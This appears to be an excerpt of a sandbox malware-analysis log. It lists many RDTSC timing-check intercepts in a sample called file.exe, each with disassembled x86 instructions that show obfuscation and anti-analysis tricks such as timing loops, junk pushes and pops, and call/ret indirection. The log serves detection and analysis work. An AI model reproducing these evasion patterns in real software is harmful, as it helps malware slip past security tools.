Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29D334 second address: 29D342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29D342 second address: 29D346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29D346 second address: 29D372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F4E04C4CBFEh 0x0000000c js 00007F4E04C4CBF6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 jmp 00007F4E04C4CC03h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29D372 second address: 29D385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jno 00007F4E04B2CB16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29D4D3 second address: 29D4DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29D4DA second address: 29D4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F4E04B2CB25h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29D4FB second address: 29D4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29D4FF second address: 29D503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29D503 second address: 29D50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0821 second address: 2A0825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0825 second address: 2A0855 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4E04C4CBF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F4E04C4CC09h 0x00000011 pushad 0x00000012 jp 00007F4E04C4CBF6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0855 second address: 2A0914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 cld 0x00000008 push 00000000h 0x0000000a or cx, 0271h 0x0000000f push C3F70BF8h 0x00000014 jmp 00007F4E04B2CB26h 0x00000019 add dword ptr [esp], 3C08F488h 0x00000020 jg 00007F4E04B2CB1Ch 0x00000026 push 00000003h 0x00000028 mov dword ptr [ebp+122D2978h], ebx 0x0000002e push 00000000h 0x00000030 mov ecx, dword ptr [ebp+122D2BB4h] 0x00000036 push 00000003h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F4E04B2CB18h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 xor ecx, dword ptr [ebp+122D2BB0h] 0x00000058 mov dx, 8DF1h 0x0000005c call 00007F4E04B2CB19h 0x00000061 jg 00007F4E04B2CB20h 0x00000067 jmp 00007F4E04B2CB1Ah 0x0000006c push eax 0x0000006d jmp 00007F4E04B2CB26h 0x00000072 mov eax, dword ptr [esp+04h] 0x00000076 push eax 0x00000077 push edx 0x00000078 jns 00007F4E04B2CB1Ch 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0914 second address: 2A097B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4E04C4CBFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jne 00007F4E04C4CC05h 0x00000012 jmp 00007F4E04C4CBFFh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jne 00007F4E04C4CBFAh 0x00000021 push esi 0x00000022 pushad 0x00000023 popad 0x00000024 pop esi 0x00000025 pop eax 0x00000026 jno 00007F4E04C4CBFAh 0x0000002c lea ebx, dword ptr [ebp+12455730h] 0x00000032 cmc 0x00000033 xchg eax, ebx 0x00000034 push ecx 0x00000035 jmp 00007F4E04C4CC02h 0x0000003a pop ecx 0x0000003b push eax 0x0000003c jnc 00007F4E04C4CC04h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0B8B second address: 2A0C04 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F4E04B2CB27h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f mov edx, dword ptr [ebp+122D2BD4h] 0x00000015 push edi 0x00000016 mov dword ptr [ebp+122D29F5h], eax 0x0000001c pop eax 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 stc 0x00000022 pop ecx 0x00000023 call 00007F4E04B2CB19h 0x00000028 je 00007F4E04B2CB23h 0x0000002e jmp 00007F4E04B2CB1Dh 0x00000033 push eax 0x00000034 jmp 00007F4E04B2CB1Dh 0x00000039 mov eax, dword ptr [esp+04h] 0x0000003d pushad 0x0000003e jmp 00007F4E04B2CB22h 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0C04 second address: 2A0C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4E04C4CC08h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0C27 second address: 2A0C94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F4E04B2CB1Ch 0x00000010 pop eax 0x00000011 mov esi, dword ptr [ebp+122D1E25h] 0x00000017 push 00000003h 0x00000019 mov dword ptr [ebp+122D39CDh], edi 0x0000001f push 00000000h 0x00000021 mov dx, 69E2h 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 push edi 0x0000002a call 00007F4E04B2CB18h 0x0000002f pop edi 0x00000030 mov dword ptr [esp+04h], edi 0x00000034 add dword ptr [esp+04h], 0000001Dh 0x0000003c inc edi 0x0000003d push edi 0x0000003e ret 0x0000003f pop edi 0x00000040 ret 0x00000041 mov dword ptr [ebp+122D2A68h], edi 0x00000047 push C45A37E7h 0x0000004c pushad 0x0000004d pushad 0x0000004e pushad 0x0000004f popad 0x00000050 push edi 0x00000051 pop edi 0x00000052 popad 0x00000053 jbe 00007F4E04B2CB1Ch 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0C94 second address: 2A0CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 045A37E7h 0x0000000c mov dword ptr [ebp+122D1DB7h], esi 0x00000012 lea ebx, dword ptr [ebp+12455744h] 0x00000018 and ecx, 660BD614h 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push edi 0x00000024 pop edi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0CB9 second address: 2A0CCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0CCD second address: 2A0CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0CD3 second address: 2A0CE2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0CE2 second address: 2A0CE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0CE6 second address: 2A0CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A0CEC second address: 2A0CF6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4E04C4CBFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 291A83 second address: 291A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BFFA5 second address: 2BFFB7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4E04C4CBF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F4E04C4CBF6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BFFB7 second address: 2BFFE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB1Ah 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4E04B2CB28h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C042E second address: 2C0443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E04C4CC01h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C0443 second address: 2C0447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C0447 second address: 2C044D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C058D second address: 2C0591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C0591 second address: 2C05A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CBFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C0977 second address: 2C097D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C097D second address: 2C0981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C0ACE second address: 2C0AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C0FE3 second address: 2C0FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C0FE9 second address: 2C1002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jc 00007F4E04B2CB16h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4E04B2CB1Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C1002 second address: 2C1020 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4E04C4CC05h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B41D5 second address: 2B41D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C1171 second address: 2C1184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F4E04C4CBFDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C18F0 second address: 2C1907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007F4E04B2CB1Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C1907 second address: 2C1911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F4E04C4CBF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C1A7E second address: 2C1A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C1A82 second address: 2C1A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C1A88 second address: 2C1A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4E04B2CB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 28AE8A second address: 28AEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F4E04C4CC02h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 push edi 0x00000011 jmp 00007F4E04C4CC06h 0x00000016 jbe 00007F4E04C4CBF6h 0x0000001c pop edi 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 28AEC8 second address: 28AED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4E04B2CB16h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C791A second address: 2C791E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C791E second address: 2C7944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4E04B2CB29h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C7944 second address: 2C7949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C7949 second address: 2C794F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C794F second address: 2C7953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C7953 second address: 2C7957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C7F5E second address: 2C7F88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jns 00007F4E04C4CBF6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F4E04C4CC06h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C690D second address: 2C6911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C8194 second address: 2C819B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CDFA1 second address: 2CDFB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB1Fh 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CE121 second address: 2CE12A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CE12A second address: 2CE138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4E04B2CB16h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CE6EB second address: 2CE70F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4E04C4CBFEh 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F4E04C4CBF6h 0x00000015 jng 00007F4E04C4CBF6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CE880 second address: 2CE884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CE9A6 second address: 2CE9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4E04C4CBF6h 0x0000000a jmp 00007F4E04C4CC06h 0x0000000f popad 0x00000010 jo 00007F4E04C4CC02h 0x00000016 je 00007F4E04C4CBF6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CE9D5 second address: 2CE9DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CE9DE second address: 2CE9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4E04C4CC06h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CE9FB second address: 2CE9FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CF277 second address: 2CF284 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CF284 second address: 2CF298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4E04B2CB1Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CF35E second address: 2CF362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CF362 second address: 2CF387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b ja 00007F4E04B2CB22h 0x00000011 jc 00007F4E04B2CB1Ch 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CF387 second address: 2CF38B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CF38B second address: 2CF391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CFEB5 second address: 2CFF2F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4E04C4CBFCh 0x0000000c ja 00007F4E04C4CBF6h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F4E04C4CC00h 0x0000001a xchg eax, ebx 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F4E04C4CBF8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 movsx edi, si 0x00000038 mov si, ax 0x0000003b call 00007F4E04C4CC07h 0x00000040 xor edi, dword ptr [ebp+122D2931h] 0x00000046 pop edi 0x00000047 nop 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CFF2F second address: 2CFF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E04B2CB1Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CFF3E second address: 2CFF67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4E04C4CC02h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e je 00007F4E04C4CC02h 0x00000014 jnp 00007F4E04C4CBFCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D0235 second address: 2D023F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F4E04B2CB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D023F second address: 2D0243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D03EF second address: 2D03F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D03F3 second address: 2D03F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D03F7 second address: 2D041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4E04B2CB21h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007F4E04B2CB18h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D14C3 second address: 2D14C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D14C8 second address: 2D1547 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F4E04B2CB18h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 jmp 00007F4E04B2CB21h 0x0000002a push 00000000h 0x0000002c mov si, 2ABCh 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007F4E04B2CB18h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c mov esi, dword ptr [ebp+122D3A3Eh] 0x00000052 mov esi, dword ptr [ebp+122D1DEBh] 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e pop eax 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D1547 second address: 2D154D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
